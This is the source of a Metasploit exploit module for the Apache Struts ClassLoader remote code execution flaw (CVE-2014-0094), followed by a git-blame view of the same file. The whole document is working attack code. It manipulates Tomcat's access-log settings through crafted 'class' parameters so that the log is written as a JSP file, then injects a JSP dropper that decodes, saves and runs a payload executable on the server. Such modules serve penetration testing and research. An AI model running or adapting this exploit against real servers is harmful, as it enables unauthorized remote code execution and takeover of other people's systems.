modules/exploits/multi/http/struts_code_exec_classloader.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote command execution vulnerability in Apache Struts
        versions < 2.3.16.2. This issue is caused because the ParametersInterceptor allows
        access to 'class' parameter which is directly mapped to getClass() method and
        allows ClassLoader manipulation, which allows remote attackers to execute arbitrary
        Java code via crafted parameters.
      },
      'Author'         =>
        [
          'Mark Thomas', # Vulnerability Discovery
          'Przemyslaw Celej', # Vulnerability Discovery
          'pwntester <alvaro[at]pwntester.com>', # PoC
          'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-0094'],
          ['CVE', '2014-0112'],
          ['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
          ['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']
        ],
      'Platform'       => %w{ linux win },
      'Targets'        =>
        [
          ['Java',
           {
               'Arch'     => ARCH_JAVA,
               'Platform' => %w{ linux win }
           },
          ],
          ['Linux',
           {
               'Arch'     => ARCH_X86,
               'Platform' => 'linux'
           }
          ],
          ['Windows',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win'
            }
          ]
        ],
      'DisclosureDate' => 'Mar 06 2014',
      'DefaultTarget'  => 0))

      register_options(
        [
          Opt::RPORT(8080),
          OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
        ], self.class)
  end

  def jsp_dropper(file, exe)
    dropper = <<-eos
<%@ page import=\"java.io.FileOutputStream\" %>
<%@ page import=\"sun.misc.BASE64Decoder\" %>
<%@ page import=\"java.io.File\" %>
<% FileOutputStream oFile = new FileOutputStream(\"#{file}\", false); %>
<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(exe)}\")); %>
<% oFile.flush(); %>
<% oFile.close(); %>
<% File f = new File(\"#{file}\"); %>
<% f.setExecutable(true); %>
<% Runtime.getRuntime().exec(\"./#{file}\"); %>
    eos

    dropper
  end

  def exec_cmd(uri, cmd = "")
    res = send_request_cgi({
      'uri'     => uri+cmd,
      'version' => '1.1',
      'method'  => 'GET',
    })

    res
  end

  def is_log_flushed?(resp, content)
    return resp.headers["Content-Length"] != "0" && resp.body =~ /#{content}/
  end

  def modify_class_loader
    prefix_jsp = rand_text_alphanumeric(3+rand(3))
    date_format = rand_text_numeric(1+rand(4))

    print_status("#{peer} - Modifying class loader")

    # Modifies classLoader parameters
    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created
    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") # Filename
    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension
    exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix"

    @jsp_file = prefix_jsp
    @jsp_file << date_format
    @jsp_file << ".jsp"

    # Wait till the log is created
    uri = "/"
    uri << @jsp_file

    created = false

    print_status("#{peer} - Waiting for the server to create the logfile")

    10.times do |x|
      select(nil, nil, nil, 2)

      # Now make a request to trigger payload
      vprint_status("#{peer} - Countdown #{10-x}...")
      res = exec_cmd(uri)

      # Failure. The request timed out or the server went away.
      fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil?

      # Success if the server has flushed all the sent commands to the jsp file
      if res.code == 200
        print_good("#{peer} - Log file created file at http://#{peer}/#{@jsp_file}")
        created = true
        break
      end
    end

    fail_with(Failure::TimeoutExpired, "#{peer} - No log file was created") unless created
  end

  # Fix the JSP payload to make it valid once is dropped
  # to the log file
  def fix(jsp)
    output = ""
    jsp.each_line do |l|
      if l =~ /<%.*%>/
        output << l
      elsif l =~ /<%/
        next
      elsif l.chomp.empty?
        next
      else
        output << "<% #{l.chomp} %>"
      end
    end
    output
  end

  def execute_jsp
    if target['Arch'] == ARCH_JAVA
      jsp = fix(payload.encoded)
      register_files_for_cleanup("#{@jsp_file}")
    else
      payload_exe = generate_payload_exe
      payload_file = rand_text_alphanumeric(4 + rand(4))
      jsp = jsp_dropper(payload_file, payload_exe)
      register_files_for_cleanup("#{payload_file}", "#{@jsp_file}")
    end

    # Inexistent URI that logs on previously created log file (with ".jsp" suffix)
    hint = rand_text_alpha(4 + rand(4))

    print_status("#{peer} - Dumping payload into the logfile")
    # Commands to be logged
    jsp.each_line do |l|
      exec_cmd(hint, l.chomp)
    end

    uri = "/"
    uri << @jsp_file

    flushed = false

    print_status("#{peer} - Waiting for the server to flush the logfile")

    10.times do |x|
      select(nil, nil, nil, 2)

      # Now make a request to trigger payload
      vprint_status("#{peer} - Countdown #{10-x}...")
      res = exec_cmd(uri)

      # Failure. The request timed out or the server went away.
      fail_with(Failure::TimeoutExpired, "Not received response") if res.nil?

      # Success if the server has flushed all the sent commands to the jsp file
      if res.code == 200 && is_log_flushed?(res, hint)
        flushed = true
        break
      end
    end

    fail_with(Failure::TimeoutExpired, "Log not flushed on time") unless flushed
  end


  def exploit
    modify_class_loader
    execute_jsp
  end

end
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Do first refactor 2014-05-01 16:39:53 -05:00			`Rank = GreatRanking`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::EXE`
			`include Msf::Exploit::FileDropper`

			`def initialize(info = {})`
			`super(update_info(info,`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:58:04 +02:00			`'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution',`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`'Description' => %q{`
			`This module exploits a remote command execution vulnerability in Apache Struts`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:58:04 +02:00			`versions < 2.3.16.2. This issue is caused because the ParametersInterceptor allows`
			`access to 'class' parameter which is directly mapped to getClass() method and`
			`allows ClassLoader manipulation, which allows remote attackers to execute arbitrary`
			`Java code via crafted parameters.`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`},`
			`'Author' =>`
			`[`
Fix msf-staff comments 2014-04-29 17:36:04 +02:00			`'Mark Thomas', # Vulnerability Discovery`
			`'Przemyslaw Celej', # Vulnerability Discovery`
			`'pwntester <alvaro[at]pwntester.com>', # PoC`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:58:04 +02:00			`'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Fix metadata 2014-05-01 15:24:10 -05:00			`['CVE', '2014-0094'],`
			`['CVE', '2014-0112'],`
			`['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],`
			`['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`],`
Fix metadata 2014-05-01 15:24:10 -05:00			`'Platform' => %w{ linux win },`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`'Targets' =>`
			`[`
Fix metadata 2014-05-01 15:24:10 -05:00			`['Java',`
			`{`
			`'Arch' => ARCH_JAVA,`
			`'Platform' => %w{ linux win }`
			`},`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`],`
Fix metadata 2014-05-01 15:24:10 -05:00			`['Linux',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'linux'`
			`}`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`],`
Fix metadata 2014-05-01 15:24:10 -05:00			`['Windows',`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`{`
Fix metadata 2014-05-01 15:24:10 -05:00			`'Arch' => ARCH_X86,`
			`'Platform' => 'win'`
			`}`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`]`
			`],`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:58:04 +02:00			`'DisclosureDate' => 'Mar 06 2014',`
Fix metadata 2014-05-01 15:24:10 -05:00			`'DefaultTarget' => 0))`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
			`register_options(`
			`[`
			`Opt::RPORT(8080),`
Fix metadata 2014-05-01 15:24:10 -05:00			`OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])`
Do first refactor 2014-05-01 16:39:53 -05:00			`], self.class)`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`end`

Do first refactor 2014-05-01 16:39:53 -05:00			`def jsp_dropper(file, exe)`
			`dropper = <<-eos`
			`<%@ page import=\"java.io.FileOutputStream\" %>`
			`<%@ page import=\"sun.misc.BASE64Decoder\" %>`
			`<%@ page import=\"java.io.File\" %>`
			`<% FileOutputStream oFile = new FileOutputStream(\"#{file}\", false); %>`
			`<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(exe)}\")); %>`
			`<% oFile.flush(); %>`
			`<% oFile.close(); %>`
			`<% File f = new File(\"#{file}\"); %>`
			`<% f.setExecutable(true); %>`
			`<% Runtime.getRuntime().exec(\"./#{file}\"); %>`
			`eos`

			`dropper`
			`end`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:58:04 +02:00			`def exec_cmd(uri, cmd = "")`
Do first refactor 2014-05-01 16:39:53 -05:00			`res = send_request_cgi({`
Do minor style changes 2014-05-01 15:25:55 -05:00			`'uri' => uri+cmd,`
			`'version' => '1.1',`
			`'method' => 'GET',`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`})`

Do first refactor 2014-05-01 16:39:53 -05:00			`res`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:58:04 +02:00			`end`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
Do minor style changes 2014-05-01 15:25:55 -05:00			`def is_log_flushed?(resp, content)`
			`return resp.headers["Content-Length"] != "0" && resp.body =~ /#{content}/`
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`end`

Do first refactor 2014-05-01 16:39:53 -05:00			`def modify_class_loader`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:58:04 +02:00			`prefix_jsp = rand_text_alphanumeric(3+rand(3))`
			`date_format = rand_text_numeric(1+rand(4))`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
Do first refactor 2014-05-01 16:39:53 -05:00			`print_status("#{peer} - Modifying class loader")`
Add comments 2014-04-29 11:24:17 +02:00
			`# Modifies classLoader parameters`
			`exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created`
			`exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") # Filename`
			`exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension`
			`exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix"`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
Do first refactor 2014-05-01 16:39:53 -05:00			`@jsp_file = prefix_jsp`
			`@jsp_file << date_format`
			`@jsp_file << ".jsp"`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`# Wait till the log is created`
			`uri = "/"`
Do first refactor 2014-05-01 16:39:53 -05:00			`uri << @jsp_file`
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00
			`created = false`

			`print_status("#{peer} - Waiting for the server to create the logfile")`

			`10.times do \|x\|`
			`select(nil, nil, nil, 2)`

			`# Now make a request to trigger payload`
			`vprint_status("#{peer} - Countdown #{10-x}...")`
			`res = exec_cmd(uri)`
Modify print_error by fail_with 2014-05-01 20:19:31 +02:00
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`# Failure. The request timed out or the server went away.`
Do first refactor 2014-05-01 16:39:53 -05:00			`fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil?`
Modify print_error by fail_with 2014-05-01 20:19:31 +02:00
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`# Success if the server has flushed all the sent commands to the jsp file`
			`if res.code == 200`
Do first refactor 2014-05-01 16:39:53 -05:00			`print_good("#{peer} - Log file created file at http://#{peer}/#{@jsp_file}")`
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`created = true`
			`break`
			`end`
			`end`

Do first refactor 2014-05-01 16:39:53 -05:00			`fail_with(Failure::TimeoutExpired, "#{peer} - No log file was created") unless created`
			`end`
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00
Do first refactor 2014-05-01 16:39:53 -05:00			`# Fix the JSP payload to make it valid once is dropped`
			`# to the log file`
			`def fix(jsp)`
			`output = ""`
			`jsp.each_line do \|l\|`
			`if l =~ /<%.*%>/`
			`output << l`
			`elsif l =~ /<%/`
			`next`
			`elsif l.chomp.empty?`
			`next`
			`else`
			`output << "<% #{l.chomp} %>"`
			`end`
			`end`
			`output`
			`end`

			`def execute_jsp`
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`if target['Arch'] == ARCH_JAVA`
Do first refactor 2014-05-01 16:39:53 -05:00			`jsp = fix(payload.encoded)`
			`register_files_for_cleanup("#{@jsp_file}")`
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`else`
			`payload_exe = generate_payload_exe`
Do first refactor 2014-05-01 16:39:53 -05:00			`payload_file = rand_text_alphanumeric(4 + rand(4))`
			`jsp = jsp_dropper(payload_file, payload_exe)`
			`register_files_for_cleanup("#{payload_file}", "#{@jsp_file}")`
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`end`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
Fix msf-staff comments 2014-04-29 17:36:04 +02:00			`# Inexistent URI that logs on previously created log file (with ".jsp" suffix)`
Do first refactor 2014-05-01 16:39:53 -05:00			`hint = rand_text_alpha(4 + rand(4))`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
Do first refactor 2014-05-01 16:39:53 -05:00			`print_status("#{peer} - Dumping payload into the logfile")`
Add comments 2014-04-29 11:24:17 +02:00			`# Commands to be logged`
Do first refactor 2014-05-01 16:39:53 -05:00			`jsp.each_line do \|l\|`
			`exec_cmd(hint, l.chomp)`
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`end`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:58:04 +02:00			`uri = "/"`
Do first refactor 2014-05-01 16:39:53 -05:00			`uri << @jsp_file`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`flushed = false`

			`print_status("#{peer} - Waiting for the server to flush the logfile")`

			`10.times do \|x\|`
			`select(nil, nil, nil, 2)`

			`# Now make a request to trigger payload`
			`vprint_status("#{peer} - Countdown #{10-x}...")`
			`res = exec_cmd(uri)`
Modify print_error by fail_with 2014-05-01 20:19:31 +02:00
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`# Failure. The request timed out or the server went away.`
Modify print_error by fail_with 2014-05-01 20:19:31 +02:00			`fail_with(Failure::TimeoutExpired, "Not received response") if res.nil?`

Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`# Success if the server has flushed all the sent commands to the jsp file`
Do first refactor 2014-05-01 16:39:53 -05:00			`if res.code == 200 && is_log_flushed?(res, hint)`
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00			`flushed = true`
			`break`
			`end`
			`end`

Modify print_error by fail_with 2014-05-01 20:19:31 +02:00			`fail_with(Failure::TimeoutExpired, "Log not flushed on time") unless flushed`
Do first refactor 2014-05-01 16:39:53 -05:00			`end`
Fix target ARCH_JAVA and remove calls to sleep 2014-05-01 00:51:52 +02:00
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00
Do first refactor 2014-05-01 16:39:53 -05:00			`def exploit`
			`modify_class_loader`
			`execute_jsp`
Add CVE-2014-0094 RCE for Struts 2 2014-04-29 03:50:45 +02:00			`end`

			`end`